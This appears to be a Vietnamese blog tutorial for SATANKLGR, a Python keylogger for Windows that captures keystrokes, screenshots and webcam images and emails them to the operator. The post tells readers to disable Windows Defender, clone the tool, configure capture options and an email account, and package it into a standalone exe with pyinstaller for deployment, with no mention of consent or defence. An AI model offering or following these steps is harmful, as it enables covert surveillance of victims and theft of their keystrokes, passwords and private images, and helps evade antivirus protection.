Giới thiệu

SATANKLGR là 1 tool được viết bằng python bởi FZGbzuw412 để tạo keylogger gửi vể mail của bạn. Nó được tạo và thiết kế dành riêng cho Window. SATANKLGR không chỉ là một tool keylogger bình thường mà nó còn có thể ghi lại keystroke, screenshot và webcam.

Hướng dẫn sử dụng

Lưu ý, để chạy được script, các bạn cần tắt Window defender đi.

Bước 1: Để tải SATANKLGR về máy, các bạn chạy câu lệnh sau:

git clone https://github.com/FZGbzuw412/SATANKLGR

Bước 2: cd tới thư mục, cài đặt các thư viện cần thiết

cd SATANKLGR
pip install -r requirements.txt

Bước 3: Khởi chạy launcher.py (file này để tạo và config tất cả mọi thứ trong keylogger)

python launcher.py

Bước 4: Các bạn cần ghi “I AGREE WITH RULES” và sau đó điền thông tin mà hiện trong phần launcher bao gồm:

  • Có chụp webcam
  • Có chụp màn hình
  • Có ghi lại bàn phím
  • Email và pass (Nó sẽ gửi mail qua máy chủ smtp nên ko lo mất acc đâu nhé)
  • Thời gian dãn cách

Bước 5: Chạy lệnh sau để bắt đầu tạo file exe

pyinstaller --onefile startup.py

Trong file Explorer, vào thư mục dist và chạy startup.exe để bắt đầu Keylogger. Nếu bạn muốn tắt keylogger đi thì chạy file terminate.bat ở thư mục gốc nhé!

Leave a Reply

This site uses cookies to offer you a better browsing experience. By browsing this website, you agree to our use of cookies.
x  Powerful Protection for WordPress, from Shield Security
This Site Is Protected By
Shield Security